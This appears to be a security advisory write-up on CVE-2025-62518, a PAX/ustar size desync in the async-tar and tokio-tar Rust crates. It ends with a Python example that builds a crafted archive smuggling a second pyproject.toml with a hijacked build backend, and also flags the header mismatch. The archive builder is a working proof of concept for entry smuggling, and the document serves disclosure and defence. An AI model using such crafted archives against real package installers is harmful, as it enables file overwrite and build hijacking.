Security researchers disclosed a high-severity vulnerability in the async-tar Rust library and its forks, including tokio-tar, that can lead to remote code execution in certain scenarios. The flaw is tracked as CVE-2025-62518 and carries a CVSS score of 8.1; it was codenamed TARmageddon by Edera, which reported the discovery in late August 2025.
Maintainers and researchers say the root cause is an inconsistent handling of PAX extended headers versus ustar headers when determining file boundaries inside TAR archives. Astral developer William Woodruff described the issue in a security advisory on GitHub, noting that the bug allows attackers to smuggle additional archive entries by exploiting that inconsistency.
When a PAX header specifies a file size that the ustar header records as zero, the parser can advance by the ustar size instead of the PAX size and fail to skip the actual file data. That behavior can cause a nested TAR archive to be interpreted as extra entries in the outer archive, enabling file overwrite attacks and potentially arbitrary code execution, Edera said. The PAX/ustar format is documented by the Open Group; PAX extended headers are used to store additional properties of member files.
The tokio-tar crate, which builds on the Tokio runtime, has not been actively maintained and was last updated on July 15, 2023, though it remains widely downloaded via crates.io. Astral has published a remediation in astral-tokio-tar version 0.5.6, and users who depend on tokio-tar are advised to migrate to that fork until patches are available.
Researchers outlined a plausible attack in which an attacker uploads a crafted package whose outer TAR contains a legitimate pyproject.toml while a hidden inner TAR contains a malicious pyproject.toml that hijacks the build backend and overwrites the real file during installation.
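To make the boundary confusion described above concrete, the following is an added Python example, not code from async-tar, tokio-tar, Edera or Astral. It builds a small archive in which the PAX header records a member's real size while the ustar size field says zero, then walks it twice: once honoring the PAX size and once advancing by the ustar size, as the affected parsers did. The member names and contents are constructed, and the returned mismatch list is the check a defender can run over incoming archives before extracting them.

```python
BLOCK = 512
blocks = lambda n: (n + BLOCK - 1) // BLOCK * BLOCK  # round a byte count up to whole blocks

def ustar_header(name, size, typeflag=b"0"):
    # Minimal 512-byte ustar header with a valid checksum (constructed sample builder).
    hdr = bytearray(BLOCK)
    hdr[0:len(name)], hdr[156:157], hdr[257:263] = name.encode(), typeflag, b"ustar\0"
    hdr[100:124], hdr[124:136] = b"0000644\0" + b"0000000\0" * 2, b"%011o\0" % size
    hdr[148:156] = b"%06o\0 " % (sum(hdr) + 8 * 32)  # checksum field counts as 8 spaces
    return bytes(hdr)

def member(name, data, ustar_size=None, typeflag=b"0"):
    # Header plus block-padded data; ustar_size lets the ustar field misreport the length.
    size = len(data) if ustar_size is None else ustar_size
    return ustar_header(name, size, typeflag) + data + b"\0" * (-len(data) % BLOCK)

def pax_record(key, value):
    # PAX record "LEN key=value\n", where LEN counts its own digits.
    body, n = f" {key}={value}\n", 1
    while len(str(n)) + len(body) != n:
        n += 1
    return f"{n}{body}".encode()

def parse_pax(blob):
    recs = [r.split(b" ", 1)[1].split(b"=", 1) for r in blob.rstrip(b"\0").split(b"\n") if r]
    return {k.decode(): v.decode() for k, v in recs}
def list_entries(archive, trust_pax_size):
    # Returns (member names, names whose PAX size disagrees with the ustar size).
    # trust_pax_size=False advances by the ustar size, the desync behind CVE-2025-62518.
    names, mismatches, pending, pos = [], [], {}, 0
    while pos + BLOCK <= len(archive):
        hdr, pos = archive[pos:pos + BLOCK], pos + BLOCK
        if hdr == b"\0" * BLOCK:  # end-of-archive marker
            break
        name = hdr[:100].rstrip(b"\0").decode()
        ustar_size = int(hdr[124:136].rstrip(b"\0"), 8)
        if hdr[156:157] == b"x":  # PAX extended header: its records apply to the next entry
            pending = parse_pax(archive[pos:pos + ustar_size])
            pos += blocks(ustar_size)
            continue
        pax_size, pending = int(pending.get("size", ustar_size)), {}
        if pax_size != ustar_size:
            mismatches.append(name)
        names.append(name)
        pos += blocks(pax_size if trust_pax_size else ustar_size)
    return names, mismatches
# Constructed sample: a nested tar whose outer ustar size field says 0 while PAX says 2048.
INNER = member("pyproject.toml", b'[build-system]\nbuild-backend = "hijacked"\n') + b"\0" * 2 * BLOCK
ARCHIVE = (member("pyproject.toml", b'[build-system]\nbuild-backend = "setuptools.build_meta"\n')
           + member("PaxHeaders/data.tar", pax_record("size", len(INNER)), typeflag=b"x")
           + member("data.tar", INNER, ustar_size=0) + b"\0" * 2 * BLOCK)
```

With `trust_pax_size=True` the walker reports two members and flags `data.tar` as inconsistent; with `trust_pax_size=False` it lands inside the nested archive and reports a second `pyproject.toml`, which is the duplicate entry an extractor would write over the legitimate one.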